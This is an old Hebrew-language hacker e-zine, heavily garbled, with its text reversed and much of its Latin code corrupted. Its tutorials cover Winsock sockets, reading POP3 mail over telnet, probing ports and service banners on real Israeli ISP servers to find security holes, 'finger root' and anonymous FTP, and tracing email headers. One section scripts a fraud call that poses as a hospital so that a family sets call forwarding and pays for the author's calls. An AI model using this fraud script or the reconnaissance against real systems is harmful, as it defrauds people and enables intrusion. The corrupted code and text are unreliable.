#שמנ !ימלוע היה הז הרבעש הנש יכ !הרבעש הנשמ עונצ רתוי לבא לארשיב 3 םירגתא ויהו !םימי
הלע קסעה לכו ינמרג וליפאו ירבע אטבמב תילגנאב תואצרה ומכ J*x םניחב וסנכנ תונב .
תמדוקה םעפב .דמחנ רתוי וליפאו ילארשי !דחא םוי הארנכ היהי הז הנשה .ואנקת ייהיהיהיה
שוגפל ולכות הנשה .ה'רבח הלחא ויה לבא !תוממעשמו ןיטולחל תונבומ יתלב ויה תואצרהה
.הללאי !ייצירעמ לכ זא """אובל הבוט הביס רבכ הז "יתוא
$קסעל !בוט
םיבשחמל רשקתהל #יא םג דמלנ הזה קלחב .תויורשקתהל ןיזאהל #יא ונדמל םדוקה קלחב
הזה טרופל רשקתנ ואוב וישכע .םייוסמ טרופ לע בישקמ תמדוקה םעפהמ רברסהש חיננ .םירחא
.העדוה חולשל הסננו
.ונלש הדובעה #ילהת היהי המ !תמדוקה םעפב ומכ בושחנ אוב
תא לחתאל !ןושאר רבד 8insock םהלש ןכסמה סקונילהש ינומכ םינכסמ םישנא םתאו הרקמב
לש ןנוכ םג םילעהו םדומב ריכהל ברסמ 9 החכש איה הבהלתה תשמתשמהש בורמ יכ הגי'ג
.סודניו תציחמכ ותוא רידגהל
$םכריכזהל !לוחתאה תדוקפ
83"$"#" inQo <
iQ X83"3tartuIXM"/86R$X+,+Y, &inQoY tn * )
MessageBo'XNM77, u&annot initiali(e 8in3ocktu, u83"3tartuIu,
MBP6/ <)
הנבמה לש םיעפומ רידגהל #רטצנ !ןבומכ sockaddrPin $טקוסה ליבשב םלש גוסמ סופיט רוצילו
int sockQd <
struct sockaddrPin destPaddr <
char 4sg[.+]q
destPaddr .הילא רבחתהל םיצור ונחנאש תבותכה יטרפ תא ליכי
.חולשל םיצור ונחנאש העדוהה תא ליכיש !#רעמ אוה ןורחאה רטמרפה
$תמדוקה םעפב ומכ
sockQd n socketX"-P,N#,36&/P3#R"M,* <)
destPaddr%sinPQa4il) n "-P,N# <
destPaddr%sinPIort n htonsXMLP6R# <)
destPaddr%sinPaddr%sPaddr n inetPaddrX,P <)
תורמואש תורדגה וכותל ונסנכהו !תורבחתהל ונתוא שמשיש טקוסה תא ונלחתאש רמוא הזש
טרופל רבחתהל הסני אוה .טנרטניאה םע םידבוע ונחנאש MLP6R# יפייאב ,P .
הדוקפה inetPaddrX,P רפסמה תא רימהל #ירצ יכ הצוחנ ) ,P $המגודל ! 9*N%93%:=%JJJ ןומיסל
( םירפסמו תודוקנ לש nu4bers!and!dots notation .ןיבמ בשחמהש המ הז יכ )
9ול םתיכיח םכלוכש עגרה !ייתוברו ייתוריבג ו-י-ש-כ-ע-ו
connectXsockQd, Xstruct sockaddr iY&destPaddr, si(eoQXstruct sockaddr <)
JJ
ב שמתשת איה הז #רוצל .רבחתהל וישכע הסנמ ונלש הדמחנה תינכותה .רמוא הז המ sockQd
.םידבוע ונחנא ותיאש טקוסה הזש $estPaddr תבותכה( רברסה יטרפ תא ליכיש רבכ ונרמא
ו )רבחתהל םיצור ונחנא הילא si(eoQ הנבמה לדוג תא טושפ ריזחי !םיעדוי חטב םתאש ומכ
sockaddr .לדוגה תא םג הכירצ איה !הדוקפה תכלוה הככ .
$העדוהה תא חלשנ ואוב וישכע
getsX4sg <)
.)תדלקמהמ( שמתשמהמ העדוה תטילקל
sendXsockQd,4sg,strlenX4sgY,* <)
העדוהה תא תחלוש הדוקפה 4sg טקוסה #רד sockQd תורדגהב םדוקמ ונרדגהש תבותכה לא
לש sockQd XdestPaddrY, strlen ' הו !םיטקוס םע הדובעב יחרכהש העדוהה לדוג ןבומכ הז *
.םש תויהל #ירצ טושפ ןבצעמה
$םדוקה קלחב רבכ ונרכהש הדוקפה !תורשקתהה תריגסל
shutdownXsockQd,3 <)
.ןוכנ !לק .הרצקב םיטקוסה תרות תאזו
$םירבדב רדס תושעל ידכ רצק םוכיס
ונחתפ רברס תונבל ידכ .רברס תארקנה תינכות תונבל #יא ונדמל socket תועדוהל הנזאהל
ב שמתשמ םירברס םע רשקתל ידכש !טניילק תונבל #יא ונדמל .םייוסמ טרופ לע תוסנכנ socket
טרופל ןיזאמ רברסה םא .םייוסמ טרופל תורשקתה תושקב תחילשל 93 טניילקהו !המגודל
טרופל רבחתהל שקבמ 93 תורשקתהה רובע חתפיו ולש השקבה תא לבקי רברסה ! socket .שדח
תא רוגסי םידדצה דחאש דע וידחי ושקשקיו ורבדי ונלש רברסהו טניילקה הזה טקוסה #רד
תרש לע ונחנא םא !המגודל .טניילקל רברסהו רברסל העדוה חולשל לוכי טניילקה .תורשקתהה
טרופ( ראוד 9= $םישיקמ ונחנאו )
: 4ail Qro4h billPgatesk4icrosoQt%co4 ; םדוק תוהדזה שקבל לוכי תרשה : Polite IeoIle
sa) H76 Qirst
!המגודל שיקנש דע ביגהל ברסלו H76 netVision%net%il .
טניילקה םע תקחשמש המלש תינכות ןתא ינא אבה #ירדמב !תצק םילבלובמ ןיידע םתא םא
המל שי !רוציקב .םיינש וא דחא טייולפסקא חתננ וליפא ילוא .התוא ריבסהל הסנאו רברסהו
9תוכחל
' תוריזחמ תודוקפה לכ ' ןייצל בושח + תא תוליעפמו !האיגש לש הרקמב errno .
.החיטבמ !בורקב הארתנ .וא'צ הללאי .ברעהל ילש תא יתמייס
!םכלש
Zero Cool, AKA, Blood Runner .
JN
תאירק E-mail נל ךרד
"ילש םירבח ם-ו-ל-ש
.בצמה המ
#יא לע רזומ #ירדמ םכל בותכא ינא ןכלו רזומ חור בצמב ינא .םתס .אל ילצא .הבבס .הלחא לכה
( רזומ קסיד םג יל שי עקרבו .טנלט #רד ליימיא אורקל Bleach אל לבא ..דמחנ - הנוורינ לש
...הדובעל הללאי זא לכשה תא םכל תלבזמ םתס ינאו )דמחנמ רתוי
לש ליימיאו 'וכו םוק.ליימיא !ליימטוה ומכ דיינ ליימיא םכל שיש םתבשח דימתש ןוכנ זא
.יפוי זא .'וכו סרפסקא קולטואא #רד ותוא םיחתופ םתא תיבהמ םירבחתמ םתאשכש תיבה
תא תושעל #יא םג םתעדי לבא "םתעדיש חטב .תיבהמ קר אל ותוא חותפל רשפאש םתעדי לבא
)$ ....הפ ינא המ ליבשב ונ .הז
( טנלט תא וחתפת בוט telnet טרופל ורבחתתו ) ++* םא .םכלש קפסה לש סנכנ ליימיא תרשה לא
םכל וחלשש םיפדה תא םכל שי םא .ולאשתו קפסל ורשקתת !תבותכה תא םיעדוי אל םתא
ינא .ליימיא תביתה תא רדסל #יא לש הרוצתב םש בותכ תויהל #ירצ !טנרטניא יונמ םתישעשכ
ב זא !בהז טנרטניא לע המגודל hostna4e $תבתוכ ינא
in%inter%net%il
עיתפמ המכ !אוה אצוי ליימיאל תרשה !בגא .םהלש סנכנ ליימיאל תרשה הזש
out%inter%net%il
טרופ ++* .סנכנ ליימיאל טרופה הז
תא םש ןיא טושפ יכ םינש המכ #שמב ילש היעבה התיה תאז !בוט .וישכע המ .ונרבחתה ..יקוא
הדוקפה
HelI וא . וא 4an
ילזמל זא .םולכ ואצמת אלו הטסיו-הטלאב שפחל םכמצעב וסנתו """תודוקפ תמישר תתל ידכ
$ןה הנהו תודוקפה תא עדיש והשימ יתשגפ
user userna4e
םוקמב וסינכת userna4e םכלש שמתשמה םש תא
Iass Iassword
םוקמב וסינכת Iassword .םכלש תורבחתה תמסיסה תא
$הככ הארי הז םתלביקש םיליימיא לש המישר םכל ןתיי רשי אוה םיתרשהמ קלחב וישכע
+ =N3J
9 =N3J9
3 3.99
םכל שיש רמוא הז 3 ומשר !םתוא אורקל ידכ .םישדח םיליימיא
retr +
הנושארה תא אורקל ידכ
retr 9
.'וכו הינשה תא אורקל ידכ
העדוה םכל ןתיי המסיסו שמתשמ םש םישיקמ םתאש ירחא !המגודל בהז טנרטניא לש תרשה
$תאזכ
4ail list droI and read)
דילקהל וכרטצתו
list
העדוהה תא ןתיי תרשה םישדח םיליימיא םכל ןיא םא .תועדוהה תמישר תא תוארל ידכ
scan list Qollows
.
טירפתב ורחבת טושפ !ותוא אורקל םיחילצמ אל םתאו ידמ רהמ רבוע ליימיאה םא .בוט
ter4inalj start logging
.םשמ וארקתו %בוקל וכל כחא .בותכי אוה וילאש %בוק ורחבתו
J.
!תועדוה קוחמל םיצור םתא םא
dele +
dele 9
.המודכו
תרזעב ורגס .םיליימיאה םע םתמייס
Ouit
טרופ #רד םיליימיא בותכל !בוט 9= .םכתא דמיל םונהיג הז יכ רבכ םיעדוי םתא
ל וכל !םיישומיש םיטרופו טנלט לע דוע דומלל םיצור םתא םא
www%haII)hacker%org
ה תא ושפח "רתויב %למומ רתא
guides to 4ostl) har4less hacking .
...םידחוימ ושיגרת זא .םוקמ ףאב יתאצמ אל ינא הפ יתרבסהש המ לבא
בוט ושיגרתו ילש םינקותמ םכל ייב
all tied uI and dried uI QoreVer, all Qucked uI and dead to the world
#he &oolest 1ero on arth )$
וא
Blood Runner
.םכליבשב
J;
םינופל תאדפיניא
לש םורופב יל הארנ( יתיאר ןמז המכ ינפל ihc $יתאזכ העדוה )

םינופלט תאדפיטניא
גייחל תרפופשה תא םירמש יממ םישקבמ ןופלט רפסמל םירשקתמש םישנא שיש יתעמש
.ונובשח לע תוחיש םישוע םה הז ירחאו םייוסמ ירפסמ דוק
. וב םישמתשמ #יאו דוקה והמ עדוי והשימ
ירמגל תוחיש תושעל #ל ןתיי אל קירטה .הז לע יתילע ףוסבו תצק יתבשחו יתבשי זא
.תוימוקמ תוחיש לש ריחמב %וח תוחיש תושעל #ל ןתיי אלא םניחב
ב שומיש לע ססובמ ןיינעה לכ N+ )ירחא בוקע( 0
.תורשה לע תבייחמ קזב #יא ןיבהל #רטצנ לכ םדוק זא
רשקתמ ג ןופלטמ םדנב . ב תיבל ירחא בוקע יתישעו א תיבב רג ינאש דיגנ
#שמה לע לבא םלשי רשקתמה ) א ( ילש תיבל ג מ החישה לע םולשתה תא ! ילא
.םלשמ ינא ירחא בוקע וילא יתישעש םוקמל ילש תיבהמ החישה
רוזאב ינאש רמאנ ואוב ישעמה עטקל וישכעו *: רשקתהל הצורו
- הזה ןופלט רפסמל *9;NJ=:39 $אבה רבדה תא האורו םינפלט רפס חתופ ינא
9999999999999 יול הנחו ןורי *:.+93:=JN
גייחי ינא זא .+93:=JN $הככ #רעב #לת החישהו
.יול ןורי לש ותחפשמ םע רבדמ ינא םולש $ינא
ןכ $ יל הנעש טוידאה
םיכרד תנואתב עגפנ ןורי םבמר םילוחה תיבמ םירבדמ ! םולש $ינא
גייחל םכילע אפורה םע רבדל םיצור םתא םא N+*9;NJ=:39 . 0
רשקתמ וישכע ינא בוט $ יל הנעש טוידיאה
.תוארתהלו הדות $ ינא
000000000000000000000000000000000000000000000000000000
ןומושר לש קתוע והש הזיא םתגשה םא $פיט
ענכשמ רתוי היהי ןיינעהש ידכ םיטרפ דוע ףיסוהל ולכות
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000
םישפיט קיפסמ ויהי םינטק םידלי קר $ פיט דוע
תיבב תויהל םירומא אל םירוהש תועשב ורשקתת זא םכל ןימאהל
000000000000000000000000000000000000000000000000000000000
לוכי התא הזה םמעשמה ןיינעה לכ תא תישעש ירחא וישכע
ל טושפ רשקתהל .+93:=JN ל תיטמוטוא הנפות התא זאו *9;NJ=:39 .
.תוסנל םינמזומ םתא לוחל תוחיש השוע הז םא קודבל בל יל היה אל $ הרעה
יע הבתכנ הבתכה y0g1 b3ar
N*
גנינקס רופ
))))))))))))))))))))))))))))))))))))))))))))))))))))))
In loving memory of Douglas Adams (1952-2001 (
))))))))))))))))))))))))))))))))))))))))))))))))))))))
ילוא סמאדא סאלגאד לזאזעל הז ימ םילאושש םכמ הלא לכל
!ושייבתת !ושייבתת זא אל םאו .והשמ םכל ריכזי היסקלגל טסיפמרטה #ירדמ
!םלועב םייקש לכה !קילדמ !בינגמ !קיחצמ !ערפומ יכה רבדה הז יכ ושייבתת
..ראשה לכבו םוקיב
םיאקיטמתמ !םיטייולפסקא םהיתובוהאל ושידקהש םישנא רבכ יתיאר .בושח אל
םהיתושנל ובתכ םהש םיליעגמה םירפסה תא הבר הבהאב ושידקהש םיאקיזיפו
!)ןמזממ רבכ תיבהמ םיפע ויה םה ןמוקמב יתייה ינא םא לבא !תרעטצמ דואמ ינא(
.וי באל יו .סאלגאדל הזה טסקטה תא שידקהל רזומ הזש תבשוח אל ינא זא
)ףוצר הז תא דיגהל וסנת( גנינאקס תצק דועו גנינאקס גנינאקס םויה טירפתב זא !בוט
- ונבצעתהש ונלש םירוסמ םיארוק הברה יתיאר םונהיג םורופב ילש םילויטה לכב יכ
.אב הז הנה זא .גנינקס טרופ םתוא םידמלמ אל ונחנא לזאזעל המל
.םיטרופה לש אלפומה םלועל יתיא ואובו )תילניגרוא( הלוק סוכ וחקית !ובשת
.#ורא תויהל לוכי הז
דומלל םילוכי דימת םתא !ימ זיוו קיטס לבא !םירבדהמ קלח םיעדוי ילוא םכקלח
.שדח והשמ
!םכלש ליימיא תביתה תא םיחתופו טנרטניאל םירבחתמ םתאש חיננ .ללכב טרופ הז המ זא
והשזיאל רבחתמ םצעב םכלש בשחמה .הרוק המ םעפ םתבשח .סרפסקא קולטואא דיגנ אוב
ארקנ הזה םוקמה .שדח לאוד םכל שי םא קדובו !םכלש טנרטניאה לש תרשה יבג לע םוקמ
אוה ליימיא תקידבה לש טרופה .טרופ ++* אוה ליימיא תחילשה לש טרופהו ! 9= .
סנכיהל ול םירמואו ןפדפדה תא םיחתופ םתא $המגוד דוע חקינ ואוב
ל www%Qoobar%co4 טרופל רבחתמ םצעב םכלש בשחמה . .* תרשה לע www%Qoobar%co4
.וב שיש ןכותה תא םכל גיצמו
.טנלט #רד תורישי םיטרופל רבחתהל רשפא !םיעדוי ילוא םתאש ומכ
רתאל תכלל םכלש ןפדפדל דיגהל םוקמב !תרמוא תאז www%Qoobar%co4 !
ל םכלש טנלטה תא םיחקול םתא www%Qoobar%co4 טרופ .* .
.הזמ ונל אצי המ לבא !תחתב םכל חומצל םיליחתמ םיצוקה תא האור ינא !ההא
.היצמרופניא םדוק םיכירצ םתא !תשרה לע והשמ %ורפל םיצור םתא םא
.%ירמ אוהש תוינכות ינימ לכו !%ירמ תרשה תכרעמ הזיא !לכ םדוק תעדל םיכירצ םתא
.וילא רודחל םילוכי םתא #יאו רתאב שי החטבא ירוח הזיא םיאור םתא הככ
.ןטק ןויסינ השענ ואוב
7תויקית וא םיצבק 7שפח 7לחתה( טנלט תא וחתפת telnet ןנוכ לע - & )
ל חיננ ורבחתתו geheno4%ceb%net טרופ .* .
.והשמ דילקהל וסנת .טנלטהמ רתאה תא םיחתופ םתא םצעב וישכע
$תאזכ האיגש תעדוה ולבקת
"/ $6&#LP H#M7 PMB7,& u!//,#-//$#$ H#M7 9%*//N 7
.תיקוח אל םתדלקהש הדוקפהש םכל דיגי תרשה זאו
ה לש הסרגה תא םיעדוי קר ונחנא ןאכמ H#M7 !הב שמתשמ רתאהש
טרופש םירקמ שי לבא .ונל ליעומ יכה אל הז זא .* ...תרחא היצמרופניא רסומ
הצור אל ינא החטבא ירוח אלמ וב שיש ללגב לבא יתיסינש רתא המגודכ חקא ינא
.ולש תבותכה תא ףייזא ינא זא !) )$ דבל ול קיזהל הצור ינא( ול וקיזתש
ל יתרבחתה www%Qoo%org%il טרופ )תפיוזמ תבותכ( .* זאו והשמ םתס יתדלקה .
$ןונגסב האיגש תעדוה הרזח יתלביק
MicrosoQt ,,3 :%* h &o44and not recogni(ed
N+
%ירמ רתאהש תיגיגח יל עידומ טרופה "הפ-וה M3 ,,3 טפוסורקיימ לש הנכות וזש
אל רבד םוש !טפוסורקיימ הז םא $גניקאהה םלועב ללכ שיו .םירתא תקזחאו לוהינל
רתא םיאצומ םתא םא .החטבא ירוח ינוילימ שי טפוסורקיימ לש םירבדב .חוטב
%ירמש ,,3 לש םיטייולפסקא שפחל וכל !המגודל ,,3 .ותוא %ורפל השק אלש ולגתו
טרופל טנלט תא יתחקל !רתא ותוא לע 9+ ה לש טרופה והז . -#P םיצבק תרש הזש
םכל שי םא קר( תולעהלו דירוהלו סנכיהל םכל רשפאמש account .תרשל םיצבק )םש
$יל העידומ טנלט 4icrosoQt -#P ףיכ הלאכ םימי ליבשב .ינממ תרשואמ ןיאו
)$ .רקובב םוקל
לע קר יכ !וישכע הז תא בוזענ לבא ,,3 ו -#P .םלש #ירדמ בותכל רשפא
טרופל וטנלט 9+ לע netVision%net%il ה תרש םכל חתפי . -#P .
ודילקה user anon)4ous
המסיס רותב םכלש ליימיאה תא יל ונת קר !יקוא ןונגסב והשמ דיגי תרשה
Iass Quckk)ou%co4
$ןונגסב והשמ ולבקתו user logged in
תרש לכ לע טעמכ -#P ( ןובשח שי account אלל סנכיהל םכל ןתונש סומינונא םשב )
םתא תוחפל לבא תרשה תא %ורפל םכל רוזעי יכה אל הז םירקמה בורב .המסיסב #רוצ
םירקמ םג שי לבא .םיבוט םירקמב םיצבק דירוהלו םש תוירפס המכ לע לכתסהל םילוכי
לע טסקט אל הז !בוש ...םירחא -#P לע בותכל החיטבמ ינא !ושקבת .טרפא אל ינא זא
.והשמ הז
( תויטנגלאב טרופהמ וקתנתה &trls-: וא Ouit .)
טרופל ורבחתה 9= חיננ !לע out%inter%net%il .חטשה תא וקדב .)בהז טנרטניא(
.יפוי .שאר'ת םתספת .ביבסמ תצק ולכתסת
םתאש היצמרופניאה לכ תא וילע וגישת !ותוא ורקחת .םכלשמ רתא םכל ורחב וישכע
$ומכ םיבושח םיטרופ וקדבת .םילוכי
9+ - -#P
93 - telnet !חותפ הזה טרופה םא
ולש םישמתשמל ןתונ תרשהש רמוא הז shell account .
!תרשה לע סקינוי תודוקפ %ירהל שמתשמל ןתונש ןובשח הז
.סקינוי תכרעמ לומ שממ אצמנ שמתשמה וליאכ
!הזה טרופה תא חתופ םכלש טנרטניא קפסה םא
!םכלש המסיסהו שמתשמה םש תא דילקהלו רבחתהל וסנ
ומכ תודומח סקינוי תודוקפ המכ %ירהל םילוכי םתאו whois .
.הזה טרופה תא ומסח םהילע תעדוי ינאש לארשיב טנרטניאה יקפס לכ לבא !לבח
9= ליימיא תביתכ -
N; - Qinger .םירשואמ דואמ .םירשואמ תויהל םילוכי םתא !חותפ אוה םאש טרופ הז
.קפסה לע םישמתשמ לע היצמרופניא גישהל רשפא הזה טרופה #רד
דילקהל וסנ Qinger root םתס וליפא וא root !המגודל
שמתשמה לע ופניט לבקל ידכ root .
. תרשה לע עגרכ םירבוחמ םישמתשמ הזיא םג תוארל ולכות םתא םימעפל
הדמחנה תינכותה םא !עגר Qinger ינימלכ לע םירבד ינימלכ ונל דיגהל הלוכי
( תונובשחל תשגל הלוכי איהש רמוא הז םישמתשמ accounts "םישמתשמ םתוא לש )
( ..לעה שמתשמל השיג םג הל שיש רמוא הזו root רזומ והשמ םידילקמ םא םימעפל "")
))))44333=*>=*=*>= המגודל הזה טרופב 3eeh ליפהלו עגתשהל הלוכי תינכותה
ה לש ןובשחה #ותל רשי םכתא root .רידנ דואמ דואמ הז !ובהלתת לא לבא ...
)$ ...ונל רזוע דואמ אוה יכ הזה טרופה תא םימסוח םיתרשה בור םגו
.* - H##P .םיעדוי םתא !ונ !םירתא ותנעי .
++* .ליימיא תאירק -
+3; "האיי "ףותיש -
ב גישהל ולכות םיעודיה םיטרופה לש המלשה המישרה תא R-& +N**
N9
ושפח( םיכמסמ ינימ לכב וא )ותוא ושפח טושפ( Iort list .)הזכ והשמ וא
-מ םה םיעודי םיטרופ + דע +*9: !םייטרדנטס םיטרופ הלא .ןוכנ תרכוז ינא םא
טרופ תרש לכ לעש תרמוא תאז 9= טרופ !ליימיאל שמשמ .* .המודכו רתאל
)$ .רתוי םירזומ םיטרופ םה הזה #רעה לעמ םיטרופ
רנאקס טרופ ודירות םיחותפ םיטרופ הזיא תוארל םיצור םתא םא
קוידב יל חקל הז !דבל ונבת וא( = תא םכל ריזחי רנאקסה .הקירס וצירתו )תוקד
םיגישמ םתא הככ יכ תינדי קורסל םג ףידע !תאז לכב .םיחותפה םיטרופה ירפסמ
.ופניא רתוי
.םכתא לבקמ אוהש #יאל בל ומיש !םייוסמ טרופל רבחתהל םיחילצמ םתאשכ
וא %ירמ אוהש הנכותה וא תרשה לש םשה תא בותכי אוה כדב
.ותוא %ורפל #יא ועדת הככ .וילע םירחא םיטרפ ינימלכ
.ןתוא וארקת .דואמ הברה תתל תולוכי ןה .האיגש תועדוהב ולזלזת לא
.הרזע לבקל וסנ $טרופל רבחתהל םיחילצמ םתאשכ ןושאר רבד
ודילקה helI וא . וסנת רזוע אל הז םא . 4an שיש הלאכ וא רתוי םיהובג םיטרופ .
.ןבצעמ יד הזו .הרזע תתל םימיכסמ אל םהש הזב םמצע לע םיניגמ תויעב הברה םהל
%ירמ תרשה !טרופל םירבחתמ םתאשכ $הרעה dae4on טרופ ותואל הניזאמש הנכות תאזש
.הזה גשומב ולקתת םא !יללכ עדיל םתס .םכממ םייוסמ טלקל הביגמו
( סוד ןולח תא וחתפ .םכלצא םיחותפ םיטרופ הזיא תוארל םיצור $ןורחא פיט M3 $63 !)
$ודילקהו
netstat !a
וילאש טרופה בותכ רתא לכ דילש !םהילא םירבוחמ םתאש םיתרשה לכ תא וארת הככ
םירבוחמ םתאש םירתאו םכלש טנרטניאה קפס תא םג םש וארת םתסה ןמ .םירבוחמ םתא
.עגרה ותואב םהילא
.אה אה )$ .עגרה ותואב קרימב וא ויקיסייאב םתייא םירבדמ םתאש םישנא םגו
טרופה דיל בותכ םא established תודוקפל הכחמו תרשה לע חותפ טרופהש רמוא הז
בותכ םאו )םכממ טלקל הכחמש רתא חיננ( םכממ listening ןיזאמו םכלצא חותפ טרופה
.עגר ותואב ותייא םירבדמ םתאש רחא ויקיסייא שמתשמל ומכ .והשמל
טרופש םיאור םתא םאו !הא 3+33N !התוא םתלכא זא םכלצא חותפ
( ינאיורט םכילע שי Back 6riQice ))))$ .)
תודוקפ ומכ ןאכ םיאשונ הברה שי -#P הצור אל ינא יכ םהילע יתטריפ אלש סודו
יל סאמנ הללאי .תשתומ יד רבכ ינא יכ םגו ירמגל םכתא שיתהל
haVe Qun
i loVe )ou
alwa)s
םכלש
Blood Runner
N3
תורתוכ תנבה E-mail
$ All in all is all we are $
( Kurt Cobain )
לע דמלנ םויה $ןויליגב היצמרופניאב ינש רועיש
.#רדב םיבשחמ ינימ לכ םע תצק קחשנ םגו !ןכרד עדימ גישהל #יאו ליימיא תורתוכ
$הזכ אוה רופיסה !בוט
.הקיזומ םע ימצע תא יתלטסמ זא יפייכ אלו ןבצעמ ברע יל היה !תואמצעה םוי
לש לוטוסמ תרזוח ינא 9 איפקהל לוכי הז יל ונימאת( ןוסנמ ןילירמ לש םימובלא
תרזוח םובו !ליימיא תקדוב !טנרטניאל תרבחתמ !)..יופש יכה םדאנבל חומה תא
$הכמב תואיצמל
-ro4h +kwalla%co%il
3ubeecth ,&g 4ail Message
$ateh "Iril J, 9*** +9h*3h99 PM $#
תונובשח םסרפמ םכממ דחא רשאכ #א קילדמ רתא םוניהיג רתא
"בוטה םעטה לובג לכ תא רבועו ליחבמ הז םירחא לש םיקנב
.םתא ימ !םכל ושייבתה
.ףסכה ליבשב םילמעו אל םתאש םכלש היעבה !םיקנב תונובשח ומסרפתש םתא ימ
"""ףסכל #רע םכל ןיא
הרטשמל רובעי אוה םסרופי הזכ #מסמ דוע
ילא בורק והשכיאש ןובשח םא ףסונ רבדו
"%ראו םיימש #פוהי םכרתאש גאדא ינא
םירשק ונל שי !םכשארב םכמד
תושק עגפי הז #מסמ ודירות אל םא םכמ דחא ספתינ םא תישיאו
"""שאב םיקסוע םתא !םיחוטב אל וישכע םתא
----------------------------------
$ownload ,&g at httIh//www%icO%co4
.הלאה םימויאה הז המ - הזירק יתפטח כחא לבא .הלחתהב יתלהבנ יד .תמא'ת
הקידצו המימת הרוחב לע הככ םייאל לבא !םיקנב תונובשח םסרפל דגנ ינא םג !וארת
".".ינומכ
תולגל םילוכי ונחנא המ הארנ ואוב .ףיוזמ ליימיא הז םתסה ןמ .וישכע המ ..יקוא
( תרתוכה לכ תא תוארל םיכירצ ונחנא הז ליבשב .וילע header .ליימיאה לש )
$קנילה לע םיצחולש הז יע הז תא םישוע םוק.ליימיאב
3how all headers
הריחב זאו העדוהה לע תינמי הציחל יע הז תא םישוע !המגודל סרפסקא קולטאאב
.םיטרפ תייסיטרכ !םינייפאמב
ב eudora רותפכה לע הציחל יע תרתוכה לכ תא םיאור blah blah blah )$ .
$יתלביקש המ הזו קנילה לע יתצחל םוק.ליימיא #רד העדוהה תא יתארקש ןוויכמ זא
4 3how all headers
3ubeecth ,&g 4ail Message
$ateh "Iril J, 9*** +9h*3h99 PM $#
#oh (arOuonke4ail%co4 "dd to "ddress Book
&& $
Return!Path r+kwalla%co%il 7
N:
ReceiVed Qro4 s4V3:N!ec%4ail%co4 b) ida:3N!ec%4ail%co4 X0ersion +%++Y Qor
r(arOuonke4ail%co4jq #ue, 9: "Ir 9**+ *.h+Nh9N !*:** X$# )
ReceiVed Qro4 4ailgw9%netVision%net%il X4ailgw9%netVision%net%il [+;:%;*%+%;]Y b)
s4V3:N!ec%4ail%co4 X.%;%3/.%;%+3M0*N*:**Y with 3M#P id ,""+J:;N Qor
r(arOuonke4ail%co4j sent b) r+kwalla%co%iljq #ue, 9: "Ir 9**+ *.h+Nh9J !*:**
X$# )
ReceiVed Qro4 walla%co%il Xras:!I9%el4%netVision%net%il [J9%*%+:N%9]Y b)
4ailgw9%netVision%net%il X.%;%3/.%;%3Y with 3M#P id P""9J;;9 Qor
r(arOuonke4ail%co4jq #ue, 9: "Ir 9**+ +=h+;h*+ s*3** X,$# )
Message!,d r9**+*:9:+9+;%P""9J;;9k4ailgw9%netVision%net%il 7
M,M!0ersion +%*
&ontent!#)Ie te't/Ilainq charsetnuiso!..=;!+
&ontent!#ransQer!ncoding baseJ:
K!M,M!"utoconVerted Qro4 .bit to baseJ: b) s4V3:N!ec%4ail%co4 id ,""+J:;N
K!$eliVer) Mail%co4 ,$" +%++
...הרוש הרוש קודבנ אוב .הלאה תויוטשה לכ המ וווא
ReceiVed Qro4 s4V3:N!ec%4ail%co4 b) ida:3N!ec%4ail%co4 X0ersion +%++Y Qor
r(arOuonke4ail%co4jq #ue, 9: "Ir 9**+ *.h+Nh9N !*:** X$# )
םשב ליימיא תרשש רמוא הז s4V3:N!ec%4ail%co4 תרשמ ליימיאה תא לביק
םשב ida:3N!ec%4ail%co4 לע םיאצמנ םהינש !בל ומיש . 4ail%co4 !
םיתרשה הלא .ילש הרעשה .תשר התוא לע םיאצמנ םהינש תורחא םילימב וא
הפיאמ תעדל םיצור ונחנא יכ ונתוא םיניינעמ ככ אל םה ןכלו םוק.ליימיא לש
.עיגה ליימיאה
( תרשה לש הסרגהו #יראתה םג ןיוצמש בל ומיש Version +%++ .)
קר +%++ טרופ לע החטבא ירוח אלמ שי חטבש !רמוא הזש ...הנשי הסרג חטב הז .. 9=
לש ida:3N!ec%4ail%co4 .עגרכ הז תא בוזענ לבא "
ReceiVed Qro4 4ailgw9%netVision%net%il X4ailgw9%netVision%net%il [+;:%;*%+%;]Y b)
s4V3:N!ec%4ail%co4 X.%;%3/.%;%+3M0*N*:**Y with 3M#P id ,""+J:;N Qor
r(arOuonke4ail%co4j sent b) r+kwalla%co%iljq #ue, 9: "Ir 9**+ *.h+Nh9J !*:**
X$# )

םשב תרשש ונל רמוא הז 4ailgw9%netVision%net%il םוק.ליימיא תרשל ליימיאה תא חלש
( s4V3:N!ec%4ail%co4 הסרגה תניוצמ םיאור םתאש ומכ .)
( %ירמ תרשהש .%;%3/.%;%+3M0*N*:** אוהש הדבועה םגו )
ליימיא לוקוטורפב שמתשמ 3#MP .
( - הו ליימיאה תרש לש יפי יאה אוה םיירגוסב יפי יאה ,$ X,""+J:;N
.חלשנש ליימיא לכל ןתינש תוהז רפסמ הז
תרשה #רד רוקמב חלשנ ליימיאהש רעשל הליחתמ ינא 4ailgw9%netVision%net%il .
$האבה הרושה תא קודבנ ואוב
ReceiVed Qro4 walla%co%il Xras:!I9%el4%netVision%net%il [J9%*%+:N%9]Y b)
4ailgw9%netVision%net%il X.%;%3/.%;%3Y with 3M#P id P""9J;;9 Qor
r(arOuonke4ail%co4jq #ue, 9: "Ir 9**+ +=h+;h*+ s*3** X,$# )
Message!,d r9**+*:9:+9+;%P""9J;;9k4ailgw9%netVision%net%il 7
וליאכ הארנ !ןושאר טבמב ""הפ ונל שי המ וארת "וווווווא walla%co%il הז אוה
N=
$ליימיאה חלשנ הנממ תיתימאה תבותכה הבותכ םיירגוסב ל-ב-א ..ליימיאה תא חלשש
ras:!I9%el4%netVision%net%il
+ J9%*%+:N%9 ,
"""
ובתכי לבא דחא תרשמ לבקתה ליימיאהש םכל ודיגי אל יתימא ליימאבש בל ומיש
...תרחא תבותכ םיירגוסב
#רד ליימיא חלש הזה יפי יאהמ והשימ 4ailgw9%netVision%net%il .ילא
בותכ יכ !םילשורי תוביבסמ והשימ el4 .
$הפ בושח יכה רבדה הנהו
Message!,d r9**+*:9:+9+;%P""9J;;9k4ailgw9%netVision%net%il 7
ונלש הרקמב( אוהשלכ תרש #רד חלשנש ליימיא לכל 4ailgw9%netVision%net%il )
( דחוימ תוהז רפסמ שי ,$ .ילוכו ןאל !חלש ימ קוידב קודבל לוכי להנמה הככ .)
$#יראת תונייצמ הדוקנה ינפלש תורפסה 9**+*:9:+9+; רמוא הזש . 9:/*:/9**+
העשב +9h+; .
